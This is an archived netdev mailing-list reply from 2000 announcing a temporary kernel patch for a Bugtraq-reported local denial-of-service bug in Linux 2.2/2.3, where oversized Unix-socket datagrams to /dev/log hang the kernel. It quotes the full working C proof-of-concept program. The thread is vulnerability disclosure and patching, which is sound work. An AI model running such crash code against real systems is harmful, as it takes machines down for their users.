netdev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Local Denial-of-Service attack against Linux

from [Gigi Sullivan] [Permanent Link][Original]
To: netdev@xxxxxxxxxxx
Subject: Re: Local Denial-of-Service attack against Linux
From: Gigi Sullivan <sullivan@xxxxxxxxxxxxx>
Date: Sat, 1 Apr 2000 13:25:49 +0200
In-reply-to: <20000327215409.A467@xxxxxxxxxxxxxxxxxxxx>; from Gigi Sullivan on Mon, Mar 27, 2000 at 09:54:19PM +0200
References: <20000323175509.A23709@xxxxxxxxxxxx> <20000327215409.A467@xxxxxxxxxxxxxxxxxxxx>
Reply-to: sullivan@xxxxxxxxxxxxx
Sender: owner-netdev@xxxxxxxxxxx 
Aiee :)
 
        Hello!
 
        Some times ago, Jay Fenlason posted the following message to bugtraq ml.
        
        I tried to do a little-easy patch to fix the problem.
        After I did that, I figure out that wasn't the right way to do it
        (although the patch worked), so I did another very little easy patch.

        This is intended to be a temporary patch (maybe stupid one, forgive me).
        Attached to this post there's the patch (tested on kernel 2.2.14).

        However, and again, I'm not sure if this will break some actual
        behaviour, so if something is wrong, please let me know.

        Thx a lot!
 
> From: Jay Fenlason <fenlason@xxxxxxxxxxxx>
> Subject:      Local Denial-of-Service attack against Linux
> X-To:         bugtraq@xxxxxxxxxxxxxxxxx
> To: BUGTRAQ@xxxxxxxxxxxxxxxxx
> Status: RO
> X-Status: A
> Content-Length: 1308
> Lines: 42
> 
> This amusing little program will hang Linux 2.2.12 (default Red Hat 6.1),
> 2.2.14 (latest stable kernel) and 2.3.99-pre2 (latest development kernel)
> on my 6x86 scratch machine and our various Pentium development machines.
> Note that this does not require any special privileges.
> 
> The send system call immediately puts the kernel in a loop spewing
> kmalloc: Size (131076) too large
> forever (or until you hit the reset button).
> 
> Apparently unix domain sockets are ignoring the /proc/sys/net/core/wmem_max
> parameter, despite the documentation to the contrary.  The fix should be
> simple, but I haven't had time to chase it down, and I'm not (usually) a
> Linux kernel developer.
> 
>                       -- JF
> 
> --- BEGIN INCLUDED SOURCE FILE ---
> 
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <string.h>
> 
> char buf[128 * 1024];
> 
> int main ( int argc, char **argv )
> {
>     struct sockaddr SyslogAddr;
>     int LogFile;
>     int bufsize = sizeof(buf)-5;
>     int i;
> 
>     for ( i = 0; i < bufsize; i++ )
>         buf[i] = ' '+(i%95);
>     buf[i] = '\0';
> 
>     SyslogAddr.sa_family = AF_UNIX;
>     strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );
>     LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
>     sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
>     return 0;
> }
> --- END INCLUDED SOURCE FILE ---
 
bye bye
 
                                                -- gg sullivan
 
-- 
Lorenzo Cavallaro       `Gigi Sullivan' <sullivan@xxxxxxxxxxxxx>
 
Until I loved, life had no beauty;
I did not know I lived until I had loved. (Theodor Korner)

Attachment: ldos_patch_last
Description: Text document

[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • Re: Local Denial-of-Service attack against Linux, Gigi Sullivan <=
Previous by Date:  rtnetlink bug in 2.3, Tobias Ringström
Next by Date:  Re: rtnetlink bug in 2.3, kuznet
Previous by Thread:  rtnetlink bug in 2.3, Tobias Ringström
Next by Thread:  Re: Queue and SMP locking discussion (was Re: 3c59x.c), Andi Kleen
Indexes:  [Date] [Thread] [Top] [All Lists]